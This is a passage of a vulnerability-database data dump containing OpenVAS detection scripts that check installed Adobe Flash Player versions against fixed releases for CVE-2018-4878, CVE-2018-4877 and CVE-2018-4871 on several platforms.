+0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:00:27 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Multiple Remote Code Execution Vulnerabilities - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:27", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-02-02T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4878", "CVE-2018-4877"], "modified": "2019-07-16T00:00:00", "id": "OPENVAS:1361412562310812688", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812688", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812688\");\n script_version(\"2019-07-16T15:57:25+0000\");\n script_cve_id(\"CVE-2018-4878\", \"CVE-2018-4877\");\n script_bugtraq_id(102893, 102930);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 15:57:25 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-02-02 11:12:23 +0530 (Fri, 02 Feb 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Multiple RCE Vulnerabilities - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n use-after-free errors in the flash player.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow an attacker to execute arbitrary code on\n affected system and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 28.0.0.137 and\n earlier within Google Chrome on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.161, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less_equal(version:vers, test_version:\"28.0.0.137\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.161\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:15:01", "description": "This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812720", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812720", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812720\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:20:07 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player prior to 28.0.0.137\n within Google Chrome on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for\n Google Chrome 28.0.0.137, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.137\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-24T21:13:59", "description": "This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates(apsb18-01)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812717", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812717", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates(apsb18-01)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812717\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:11:38 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Adobe Flash Player Security Updates(apsb18-01)-Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 28.0.0.137 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.137 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.137\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-24T21:13:20", "description": "This host is installed with Adobe Flash Player\n and is prone to information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812719", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812719", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812719\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:17:07 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player prior to 28.0.0.137\n within Google Chrome on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for\n Google Chrome 28.0.0.137, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.137\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-19T19:25:18", "description": "This host is missing a critical security\n update according to Microsoft KB4056887.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Security Update (KB4056887)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2020-06-17T00:00:00", "id": "OPENVAS:1361412562310812722", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812722", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Security Update (KB4056887)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812722\");\n script_version(\"2020-06-17T13:37:18+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-17 13:37:18 +0000 (Wed, 17 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:35:52 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Security Update (KB4056887)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4056887.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1511 for x32/x64 Edition\n\n - Microsoft Windows 10 Version 1607 for x32/x64 Edition\n\n - Microsoft Windows 10 Version 1703 for x32/x64 Edition\n\n - Microsoft Windows 10 Version 1709 for x32/x64 Edition\n\n - Microsoft Windows 10 x32/x64 Edition\n\n - Microsoft Windows 8.1 for x32/x64 Edition\n\n - Microsoft Windows Server 2012/2012 R2/2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/kb/4056887\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1, win2016:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path = path + \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 28.0.0.137\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-24T21:13:33", "description": "This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates(apsb18-01)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812716", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812716", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates(apsb18-01)-Windows\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812716\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:07:31 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Adobe Flash Player Security Updates(apsb18-01)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 28.0.0.137 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 28.0.0.137 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.137\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-24T21:13:43", "description": "This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812721", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812721", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Mac OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812721\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2018-4871\");\n script_bugtraq_id(102465);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 15:22:31 +0530 (Wed, 10 Jan 2018)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update(apsb18-01)- Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an out-of-bounds\n read error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will lead to information exposure.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player prior to 28.0.0.137\n within Google Chrome on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for\n Google Chrome 28.0.0.137, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-01.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:vers, test_version:\"28.0.0.137\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"28.0.0.137\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-24T21:13:29", "description": "This host is installed with Adobe Flash Player\n and is prone to an information disclosure vulnerability.", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates(apsb18-01)-Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4871"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310812718", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812718", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates(apsb18-01)-Mac OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin 